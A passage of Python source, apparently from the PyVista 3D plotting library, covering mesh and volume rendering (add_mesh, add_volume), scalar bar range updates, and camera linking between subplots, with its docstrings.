on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
render_lines_as_tubes : bool, optional
smooth_shading : bool, optional
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults to ``False``.
rgb : bool, optional
If a 2-dimensional array is passed as the scalars, plot those
values as RGB(A) colors. ``rgba`` is also an accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
transparency.
below_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``below_label`` to
``'Below'``
above_color : string or 3 item list, optional
Solid color for values above the scalars range (``clim``). This
will automatically set the scalar bar ``above_label`` to
``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
string annotations.
pickable : bool
Set whether this mesh is pickable
Return
------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(mesh)))
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, mesh.memory_address)
if nan_color is None:
nan_color = rcParams['nan_color']
nan_color = list(parse_color(nan_color))
nan_color.append(nan_opacity)
if color is True:
color = rcParams['color']
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('scalars array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if has_matplotlib:
from itertools import cycle
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
mesh.compute_normals(cell_normals=False, inplace=True)
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
if stitle is None:
stitle = original_scalar_name
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=preference, err=True)
opacity = normalize(opacity)
_custom_opac = True
except:
# Or get opacity transfer function
opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise RuntimeError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
pass
else:
opacity = opacity_transfer_function(opacity, n_colors)
if use_transparency and np.max(opacity) <= 1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalars formatting ==================================================
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
# TODO: if a string array is given, digitize it and annotate the values
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = '{}-digitized'.format(title)
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool:
scalars = scalars.astype(np.float)
def prepare_mapper(scalars):
# Scalars interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
else:
self.mapper.SetColorModeToMapScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if log_scale:
table.SetScaleToLog10()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
if not has_matplotlib:
cmap = None
logging.warning('Please install matplotlib for color maps.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opacities
if isinstance(opacity, np.ndarray) and not _custom_opac:
ctable[:,-1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = cmap(hue)[:, :3]
# combine colors and alpha into a Nx4 matrix
scalars = np.concatenate((scalars, opacity[:, None]), axis=1)
scalars = (scalars * 255).astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
geom.points -= geom.center
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
self.renderer.Modified()
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
culling=False, multi_colors=False,
blending='composite', mapper=None,
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom-made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', 'Greys', 'Oranges', and 'Purples'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'composite'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
If ``None`` the ``"volume_mapper"`` in the ``rcParams`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
string annotations.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity transfer
function is defined. Meaning that over that distance, a given
opacity (from the transfer function) is accumulated. This is
adjusted for the actual sampling distance during rendering. By
default, this is the length of the diagonal of the bounding box of
the volume divided by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may perform
shading calculations - in some cases shading does not apply
(for example, in a maximum intensity projection) and therefore
shading will not be performed even if this flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default 0.7
specular : float, optional
The specular lighting coefficient. Default 0.2
specular_power : float, optional
The specular power. Between 0.0 and 128.0. Default 10.0
Return
------
actor: vtk.vtkVolume
VTK volume of the input data.
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_volume`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if culling is True:
culling = 'backface'
if mapper is None:
mapper = rcParams["volume_mapper"]
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(volume)))
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = '{}({})'.format(type(volume).__name__, volume.memory_address)
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories,
culling=culling, clim=clim,
mapper=mapper, pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade, diffuse=diffuse, specular=specular,
specular_power=specular_power)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError('Type {} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.'.format(type(volume)))
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalars_info[1]
else:
raise RuntimeError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data' if stitle is None else stitle
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=preference, err=True)
if stitle is None:
stitle = title
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(float)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': vtk.vtkGPUVolumeRayCastMapper,
'open_gl': vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise RuntimeError('Mapper ({}) unknown. Available volume mappers include: {}'.format(mapper, ', '.join(mappers.keys())))
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(float)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
if cmap is not None:
if not has_matplotlib:
cmap = None
raise RuntimeError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError('Blending mode \'{}\' invalid. '.format(blending) +
'Please choose one of \'additive\', \'composite\', '
'\'average\', \'minimum\' or \'maximum\'.')
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
self.renderer.Modified()
return actor
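# A minimal, hypothetical usage sketch for ``add_volume`` (the array values
# below are arbitrary; a NumPy array is wrapped internally as shown above, and
# ``'linear'`` is assumed to be a valid named opacity mapping):
#     >>> import numpy as np
#     >>> import pyvista
#     >>> data = np.random.random((32, 32, 32))
#     >>> pl = pyvista.Plotter()
#     >>> actor = pl.add_volume(data, cmap='viridis', opacity='linear')
#     >>> pl.show()  # doctest:+SKIP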
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : 2 item list
The new range of the scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.'.format(name))
return
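# A hedged usage sketch for ``update_scalar_bar_range`` (the array name and
# values are illustrative; ``stitle`` is assumed to be accepted by ``add_mesh``
# as it is by ``add_volume`` above, so the bar is registered under that title):
#     >>> import pyvista
#     >>> sphere = pyvista.Sphere()
#     >>> sphere['z'] = sphere.points[:, 2]
#     >>> pl = pyvista.Plotter()
#     >>> _ = pl.add_mesh(sphere, scalars='z', stitle='Elevation')
#     >>> pl.update_scalar_bar_range([-0.25, 0.25], name='Elevation')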
def clear(self):
"""Clear plot by removing all actors and properties."""
for renderer in self.renderers:
renderer.clear()
for renderer in self._background_renderers:
if renderer is not None:
renderer.clear()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
"""
if isinstance(views, int):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
'{} is given'.format(type(views)))
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
'{} is given'.format(type(views)))
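# A hypothetical sketch of linking and unlinking subplot cameras (``subplot``
# is assumed to be available on this plotter, as elsewhere in the class):
#     >>> import pyvista
#     >>> pl = pyvista.Plotter(shape=(1, 2))
#     >>> pl.subplot(0, 0)
#     >>> _ = pl.add_mesh(pyvista.Sphere())
#     >>> pl.subplot(0, 1)
#     >>> _ = pl.add_mesh(pyvista.Cube())
#     >>> pl.link_views()      # both renderers now share one camera
#     >>> pl.unlink_views(1)   # give the second renderer its own camera again
#     >>> pl.show()  # doctest:+SKIP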
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=False, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=None, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None, fill=False):
"""Create scalar bar using the ranges as set by the last input mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the label font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the window's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the window's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalars range
above_label : str, optional
String annotation for values above the scalars range
background_color : array, optional
The color used for the background in RGB format.
n_colors : int, optional
The maximum number of colors displayed in the scalar bar.
fill : bool
Draw a filled box behind the scalar bar with the ``background_color``
Notes
-----
Setting title_font_size or label_font_size disables automatic font
sizing for both the title and label.
"""
if interactive is None:
interactive = rcParams['interactive']
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
